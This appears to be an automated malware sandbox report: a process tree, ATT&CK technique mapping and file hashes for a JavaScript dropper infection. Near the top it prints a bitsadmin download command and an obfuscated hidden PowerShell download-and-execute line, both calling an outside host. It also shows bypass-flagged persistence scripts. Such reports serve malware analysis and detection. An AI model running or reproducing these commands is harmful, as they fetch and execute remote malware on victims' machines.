"C:\Windows\System32\WScript.exe" "E:\New_Document-#3765618.js"
1⤵
- Checks computer location settings
- Enumerates connected drives
PID:5680
- C:\Windows\System32\bitsadmin.exe
  "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://aeroox.000webhostapp.com/mes/010111100110101101001111111101011011100101011110 C:\Users\Admin\AppData\Local\Temp\pmqfgkdqzsbsvsamfrryrizflqdvvwqqctmqvepuyuplixbkjbforifcqtpxeylsnfsloatiuqykwi
  2⤵
  - Download via BitsAdmin
  PID:5728
- C:\Windows\System32\wscript.exe
  "C:\Windows\System32\wscript.exe" //E:VBScript C:\Users\Admin\AppData\Local\Temp\pmqfgkdqzsbsvsamfrryrizflqdvvwqqctmqvepuyuplixbkjbforifcqtpxeylsnfsloatiuqykwi
  2⤵
  - Checks computer location settings
  PID:5356
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='zalooma(''https://aeroox.000webhostapp.com/mes/'')'.RePLACe('zalooma','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3600

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:6136

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\ProgramData\Music\Visuals\VsLabs.vbs"
1⤵
- Checks computer location settings
PID:4752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" "
  2⤵
  PID:5552
- - C:\Windows\system32\cmd.exe
    cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
    3⤵
    PID:6136
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      PID:4644
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        5⤵
        
        PID:1460
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:636

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1892
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ff83e14cc40,0x7ff83e14cc4c,0x7ff83e14cc58
  2⤵
  PID:4664
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1920,i,4025198587597463577,5648890715064850329,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1900 /prefetch:2
  2⤵
  PID:5204
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2224,i,4025198587597463577,5648890715064850329,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2212 /prefetch:3
  2⤵
  PID:4540
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2288,i,4025198587597463577,5648890715064850329,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2556 /prefetch:8
  2⤵
  PID:3012
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3188,i,4025198587597463577,5648890715064850329,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3196 /prefetch:1
  2⤵
  PID:4232
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3412,i,4025198587597463577,5648890715064850329,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3456 /prefetch:1
  2⤵
  PID:3148
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4608,i,4025198587597463577,5648890715064850329,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4552 /prefetch:1
  2⤵
  PID:5032
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4804,i,4025198587597463577,5648890715064850329,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4576 /prefetch:8
  2⤵
  PID:2424
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4964,i,4025198587597463577,5648890715064850329,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4940 /prefetch:8
  2⤵
  PID:1248

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:6012

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:2344

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:2484
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:5428
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1988 -parentBuildID 20240401114208 -prefsHandle 1916 -prefMapHandle 1908 -prefsLen 23602 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {020b4a02-d107-4de4-96ab-24b271fcfb02} 5428 "\\.\pipe\gecko-crash-server-pipe.5428" gpu
    3⤵
    PID:5984
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2380 -parentBuildID 20240401114208 -prefsHandle 2364 -prefMapHandle 2360 -prefsLen 23638 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {704c964b-e328-4682-a3c2-f5f2d9b3d502} 5428 "\\.\pipe\gecko-crash-server-pipe.5428" socket
    3⤵
    - Checks processor information in registry
    PID:5308
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3184 -childID 1 -isForBrowser -prefsHandle 3088 -prefMapHandle 3180 -prefsLen 23779 -prefMapSize 244628 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {50d33603-97af-4f1c-b8a3-6c8889e8d64e} 5428 "\\.\pipe\gecko-crash-server-pipe.5428" tab
    3⤵
    PID:3160
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=856 -childID 2 -isForBrowser -prefsHandle 3648 -prefMapHandle 3772 -prefsLen 29012 -prefMapSize 244628 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1fd67030-334c-49fc-bddd-9e97e6274b4f} 5428 "\\.\pipe\gecko-crash-server-pipe.5428" tab
    3⤵
    PID:1464
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4812 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4840 -prefMapHandle 4836 -prefsLen 29012 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3047bdf6-f6bd-4bac-b58b-10d5fac8fcb4} 5428 "\\.\pipe\gecko-crash-server-pipe.5428" utility
    3⤵
    - Checks processor information in registry
    PID:3144
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5212 -childID 3 -isForBrowser -prefsHandle 5140 -prefMapHandle 4300 -prefsLen 26989 -prefMapSize 244628 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {faad8889-c9e8-42b1-8880-dd780bab0726} 5428 "\\.\pipe\gecko-crash-server-pipe.5428" tab
    3⤵
    PID:3280
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5440 -childID 4 -isForBrowser -prefsHandle 5360 -prefMapHandle 5368 -prefsLen 26989 -prefMapSize 244628 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {75e8a50e-8a24-421a-94ec-9de68f0f7c95} 5428 "\\.\pipe\gecko-crash-server-pipe.5428" tab
    3⤵
    PID:6136
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5632 -childID 5 -isForBrowser -prefsHandle 5552 -prefMapHandle 5560 -prefsLen 26989 -prefMapSize 244628 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {40a01479-cde2-4ecf-8932-f3c9a0d20831} 5428 "\\.\pipe\gecko-crash-server-pipe.5428" tab
    3⤵
    PID:1080

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:6096
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  PID:5300

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:6136
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff83d7446f8,0x7ff83d744708,0x7ff83d744718
  2⤵
  PID:1388
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2008,671610000264804353,3941249694724223971,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2024 /prefetch:2
  2⤵
  PID:5992
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2008,671610000264804353,3941249694724223971,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2540 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5984
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2008,671610000264804353,3941249694724223971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2908 /prefetch:8
  2⤵
  PID:5844
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,671610000264804353,3941249694724223971,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:1
  2⤵
  PID:3460
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,671610000264804353,3941249694724223971,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3448 /prefetch:1
  2⤵
  PID:3660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,671610000264804353,3941249694724223971,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5052 /prefetch:1
  2⤵
  PID:5532
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,671610000264804353,3941249694724223971,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5036 /prefetch:1
  2⤵
  PID:6120
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2008,671610000264804353,3941249694724223971,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2928 /prefetch:8
  2⤵
  PID:2764
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2008,671610000264804353,3941249694724223971,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2928 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,671610000264804353,3941249694724223971,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5300 /prefetch:1
  2⤵
  PID:4724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,671610000264804353,3941249694724223971,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5360 /prefetch:1
  2⤵
  PID:5068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,671610000264804353,3941249694724223971,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4456 /prefetch:1
  2⤵
  PID:2228
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,671610000264804353,3941249694724223971,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5436 /prefetch:1
  2⤵
  PID:2452

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5852

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5368

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\ProgramData\Music\Visuals\VsLabs.vbs"
1⤵
- Checks computer location settings
PID:5420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" "
  2⤵
  PID:3880
- - C:\Windows\system32\cmd.exe
    cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
    3⤵
    PID:876
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      PID:4692
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        5⤵
        
        PID:1600
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5352

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

Persistence

BITS Jobs

T1197

Privilege Escalation

Defense Evasion

BITS Jobs

T1197

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Music\Visuals\VsEnhance.bat

Filesize
145B

MD5
0876c0866ff104e1cea58c3a8ce7c00c

SHA1
f5db743e203b5ad23a46e0fa58a3e58b8dfeead7

SHA256
434d5f5a3a796e0c6644c39c4c3f5cae78f66e0a830c24c5d401288a0e92109a

SHA512
ff28b707e77e9849a6d9a9c1bdbf95aa0a773c3d00f3e9353c21cd6589f56649eed88ae59134f57ca40922743fe5b2dbf5b8b5ad3bcf93b13e35545c80b618d3

Download Submit
C:\ProgramData\Music\Visuals\VsLabs.vbs

Filesize
178B

MD5
6b1d3687fe689ec1d149478bc8bb9df9

SHA1
ce533bb5c0c01a23183f25c43dd7cafee32d4dfb

SHA256
1de54fe06e01ec6482104f63ae17c89cec7866c51012fc5557230cce01270a7e

SHA512
105e0d91e855ebb2b7bce18b3b207f49fa9eae2b1687ba4e41db8e872f0cc422744cb0145e834d8e596130a167a3bd399c70576d6d205f699636e0a6fcc44a7b

Download Submit
C:\ProgramData\Music\Visuals\VsLabsData.ps1

Filesize
322KB

MD5
6b14644d7eac25df60ba7a766647e748

SHA1
eaf8af171079bf33bec4b00c54dbc13d0a505c27

SHA256
e829b43401056f35cebe255400c0ef2e8df0864c02a9b5279486ddc30c1179b5

SHA512
18a2abc251fd05be2564b9c14cba103964c9237a6d77646ccd62a935cd35fa2bc3f3f566f6ae7ad88a664dc202296f793ea508ae47ac725bb984b67c26fd6876

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
3ed2ebd7ec0a7a7418da1c952b44edcd

SHA1
7f6aece50fd150253a75d1a101d592dbfad1a290

SHA256
3c275d2de8c0a210c630c114b26446c3e0d4c97d6091756a0f552437ba2cd498

SHA512
63cfc305752a8a115fb79b96ae3655cc1597c18600f55c0ceca14cef30760b8f766679cc5544cd6606fc63cce2c8ff78f8a498bce5f4e026113d6329a385ca6f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
507d9adc8c07bf05428a189d097df1e0

SHA1
81ec81800ae4be1cf23dbb71f687ff5cfd488467

SHA256
a648930e1b01c65ef5bcd7767c4be17b43a60624587e12b9815e79cd8cf58f1a

SHA512
18fa6b5918fb8431481bf3f0741b957cff2a9bf55e6abba804656b166b4b747bc11360a665f31c7ffc0c171b0687af0711c7d032c13320b67f396fea4c9ad674

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
3b43a34d4bb089b0a9c9ab03d21106a3

SHA1
9025f6565ada89906ac310a4fbc15e5c05e02ed6

SHA256
60d7ad79f3f13a3d82263040faf2e922a89d303d26588a74371cf45c9fd642be

SHA512
356697c05305d528a9a7fff6c9e97be82c2d43d0cdce82d6c36d33f5ca694bd30dd0bf206219fc1beb5972e3e950d050eb19d6859802f9de7b8fb2daa43917c7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
3b0274514f4a3a620dff484f548ef492

SHA1
a97446d642670ff69431b26c0e95ab50a874ec7c

SHA256
2b6709a0aea28697f75b17da4b8bb4164c15a7f4abcdeb17434c5caa249a9605

SHA512
a5dcc228249b170ee4955c5cd6435444fa36255f0844c3ea2c4ee8aceb668e40257130e64441690771df4a230b08864ccbaebd79ca3866a8f889f16ced76563b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
fd37f3921d7fda50614b448c79b50591

SHA1
0d0d3f271d7f43decb872c795e2883973bd9a755

SHA256
6d47689f22719338d2e81629252491260a9b2e432755959ad75d9677dbd2a2ee

SHA512
3cfbc1844e24339d0d0a50051359b96721baf62838af76cf5eefa0ad2f86fd48d56038d3b6cfe3644ffdf88e5c455a08d4ad2fa446323593b142c8a4cba22505

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
205KB

MD5
0dc7aae312320975810fefe90b979e1c

SHA1
e9459ad11fb592e04277786ceb010a9fd7c45fb9

SHA256
44bc6d7dc5226019bbef924bd8013732b5f531cb766d1617fe0bd02b6a6eb14b

SHA512
01404bb9276717e345359389f28cbb3b2da730b91f9dda655dba3bf37eb24572c766f63b91fa0ec81255ef26aa0184f6b864f8fa958ac698fea1d8bffc25b6b7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
7d9410c59629bf1033977402ce14f933

SHA1
3972e384f04ad4e35c6309733862c483eac5c25c

SHA256
a1e0978a2fa5791f721e10c19f9eb4ee1b0d973fa2c96106d8bdb5ebc1248e74

SHA512
e1711138bde561dc146ac55b2576227dd145b82ff3f0a18d5c6e14992f3de01104f4310a394b9fe03c523149a68cfb930621fd639ef28d5545ff69fec134066b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
ecf7ca53c80b5245e35839009d12f866

SHA1
a7af77cf31d410708ebd35a232a80bddfb0615bb

SHA256
882a513b71b26210ff251769b82b2c5d59a932f96d9ce606ca2fab6530a13687

SHA512
706722bd22ce27d854036b1b16e6a3cdb36284b66edc76238a79c2e11cee7d1307b121c898ad832eb1af73e4f08d991d64dc0bff529896ffb4ebe9b3dc381696

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
4dd2754d1bea40445984d65abee82b21

SHA1
4b6a5658bae9a784a370a115fbb4a12e92bd3390

SHA256
183b8e82a0deaa83d04736553671cedb738adc909f483b3c5f822a0e6be7477d

SHA512
92d44ee372ad33f892b921efa6cabc78e91025e89f05a22830763217826fa98d51d55711f85c8970ac58abf9adc6c85cc40878032cd6d2589ab226cd099f99e1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
3e9e57e335e6d218f8c0b6adecafb597

SHA1
3ceeaed4d7c218bc48dada5dad1d7414f4680546

SHA256
8fd0af6e8d1e9302ee0659cf812b70607380a13a0c6ee216683f2628398cd7a1

SHA512
6cd486a84d82af82c7473ef97673c100fb4bd84b5382fc6a1a0c9ecf3b8f14fcee1eb77a765bcfca2ee06972094a8497b3f239ae6661571741d0530d4e581776

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0

Filesize
44KB

MD5
0a1e1ac3de36eb4d9240f2b89306937f

SHA1
17cb97142bbcd0ff96f327851c95c58df08bbde1

SHA256
1afcbcf1df6ecf233145325637e5353731b9688bf0f8896e4772e943298c4278

SHA512
1341393b4405f6ff31cb81e2eb6cee30b71775edb3cbf8f0ccd38eeb860b4f92c98e6b0b15107fa98f37eec90bf0fdc0ece05a985e5d93fa6ffd49b7c3f1d51f

